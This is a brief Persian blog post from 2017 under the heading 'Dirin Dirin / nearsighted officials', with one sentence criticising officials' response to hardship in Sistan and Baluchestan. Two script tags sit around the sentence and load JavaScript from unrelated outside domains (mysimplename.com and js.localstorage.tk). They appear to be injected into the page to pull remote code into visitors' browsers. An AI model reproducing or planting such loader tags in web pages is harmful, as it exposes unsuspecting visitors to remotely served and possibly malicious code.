دیرین دیرین / مسئولین نزدیک بین!!


<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>برخی مسئولان با درد و رنج مردم سیستان و بلوچستان،حتی سلفی هم نگرفتند!<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>


+ 
0

- 
0
ارسال در 1395/11/19 ساعت 10:16 2017-2-7 09:16:28
mohsen
توسط mohsen


عرض x طول

دکمه اشتراک گذاري تلگرام ارسال ويدئو در تلگرام

ارسال نظر